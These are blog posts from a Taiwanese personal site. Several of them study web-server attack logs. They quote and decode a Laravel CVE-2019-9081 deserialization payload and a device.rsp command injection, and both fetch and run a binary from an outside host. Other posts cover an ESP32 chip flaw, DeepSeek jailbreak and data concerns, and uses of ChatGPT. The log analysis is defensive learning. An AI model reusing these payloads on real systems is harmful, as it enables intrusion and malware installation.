2025年3月15日 星期六

從 Web Log 學習系統漏洞 94


weblog上一段來自台灣 IP: 1.163.243.200 的攻擊: 
1.163.243.200 - - [14/Mar/2025:19:46:40 +0800] "GET /public/index.php/index?code=O%3A44%3A%22Illuminate%5CFoundation%5CTesting%5CPendingCommand%22%3A4%3A%7Bs%3A10%3A%22%00%2A%00command%22%3Bs%3A6%3A%22system%22%3Bs%3A13%3A%22%00%2A%00parameters%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A2%3A%22cmd.exe+%2Fc+certutil+-urlcache+-split+-f+http%3A%2F%2F26.99.153.102%3A19490%2Fspread.txt+C%3A%5CProgramData%5Cspread.exe+%26%26+C%3A%5CProgramData%5Cspread.exe%22%3B%7Ds%3A6%3A%22%00%2A%00app%22%3BO%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3A2%3A%7Bs%3A22%3A%22%00%2A%00hasBeenBootstrapped%22%3Bb%3A0%3Bs%3A11%3A%22%00%2A%00bindings%22%3Ba%3A1%3A%7Bs%3A35%3A%22Illuminate%5CContracts%5CConsole%5CKernel%22%3Ba%3A1%3A%7Bs%3A8%3A%22concrete%22%3Bs%3A33%3A%22Illuminate%5CFoundation%5CApplication%22%3B%7D%7D%7Ds%3A4%3A%22test%22%3BO%3A27%3A%22Illuminate%5CAuth%5CGenericUser%22%3A1%3A%7Bs%3A13%3A%22%00%2A%00attributes%22%3Ba%3A2%3A%7Bs%3A14%3A%22expectedOutput%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7Ds%3A17%3A%22expectedQuestions%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A1%3A%221%22%3B%7D%7D%7D%7D HTTP/1.1" 404 220 "-" "Mozilla/5.0 (Android; Linux armv7l; rv:10.0.1) Gecko/20100101 Firefox/10.0.1 Fennec/10.0.1"

經解碼後得到:
/public/index.php/index?code=O:44:"Illuminate\Foundation\Testing\PendingCommand":4:{s:10:"*command";s:6:"system";s:13:"*parameters";a:1:{i:0;s:2:"cmd.exe /c certutil -urlcache -split -f http://26.99.153.102:19490/spread.txt C:\ProgramData\spread.exe && C:\ProgramData\spread.exe";}s:6:"*app";O:33:"Illuminate\Foundation\Application":2:{s:22:"*hasBeenBootstrapped";b:0;s:11:"*bindings";a:1:{s:35:"Illuminate\Contracts\Console\Kernel";a:1:{s:8:"concrete";s:33:"Illuminate\Foundation\Application";}}}s:4:"test";O:27:"Illuminate\Auth\GenericUser":1:{s:13:"*attributes";a:2:{s:14:"expectedOutput";a:1:{i:0;s:1:"1";}s:17:"expectedQuestions";a:1:{i:0;s:1:"1";}}}}

詢問估狗大神後得知這是一個 CVE-2019-9081 Laravel 反序列化漏洞攻擊, Laravel是一個開源的 PHP Web 框架, 攻擊者可能利用未受信任的反序列化觸發 __destruct(), 進而執行 Artisan指令或系統命令導致遠端代碼執行(RCE), 要防範這類攻擊則建議避免使用 unserialize() 解析外部輸入, 並檢查應用程式是否存在未受信任的反序列化點, 升級 Laravel

2025年3月13日 星期四

中國藍芽晶片疑含有後門漏洞程式

西班牙資安業者 Tarlogic Security發現, 由中國一家科技公司製造生產支援藍牙與 Wi-Fi的 ESP32微控制器晶片含有未被公開的指令, 可被駭客用來執行攻擊行動, 這些未公開指令被編號 CVE-2025-27840漏洞, 可允許駭客修改晶片以解鎖其它功能, 植入惡意程式, 或是進行裝置身分竊盜攻擊, 可被用於冒充受信任裝置、未授權存取資料、攻擊網路上的其他設備, 並可能建立長期持續性的攻擊

2025年2月21日 星期五

從 Web Log 學習系統漏洞 93

91.224.92.10 - - [20/Feb/2025:16:17:56 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"
91.224.92.10 - - [20/Feb/2025:16:22:58 +0800] "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F45.125.66.114%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.1" 404 534 "-" "Mozila/5.0"

來自英國 91.224.92.10 的入侵者:

2025年2月10日 星期一

DeepSeek恐將用戶輸入資料傳至中國

有許多資安專家指出 DeepSeek若進行越獄(修改使用權限), 可使這款 AI模型能產生惡意輸出的內容, 例如開發勒索軟體、偽造幾可亂真的敏感資訊, 另外也有人指出 DeepSeek疑似與中國國營電信業者串連, 擅自建置能將用戶資料傳送給中國移動電信, 而可能讓中國政府直接存取相關資料, 不只可能對使用者收集帳密資料、聊天內容、上傳的檔案, 甚至還會進行即時監控特定使用者活動

2025年1月29日 星期三

2025 農曆新年 Google小遊戲 貪食蛇


貪食蛇, 舊手機時代的懷舊遊戲搬上網頁, 隨著不同的設定, 遊戲也有不同的變化

2025年1月28日 星期二

使用ChatGPT製作新年賀圖

話先說在前頭, 可能是我輸入的內容及關鍵字不夠詳細, 不過還是有畫出來(雖然跟我想像的結果差很多), 最後還是要用工具編輯修改, 所以不要太期待叫 AI 畫圖😆

1. 第一張是很有過年氣氛, 但感覺太複雜了

2. 第二張叫它改變畫風, 製作可愛一點(不過為什麼都喜歡畫眼鏡蛇?), 文字部分有待改善

3. 第三張不知所云...

4. 免費版的 ChatGPT似乎有每日製圖限制, 這張是第二天再重畫的, 有接近我想要的感覺, 但寫什麼東西看不懂, 依舊喜歡畫眼鏡蛇

5. 同上一張還是看不懂寫什麼東西 😂

2024年12月12日 星期四

ChatGPT網站掛了?

早上要來跟我的 AI老師學習時, 發現它居然不在家?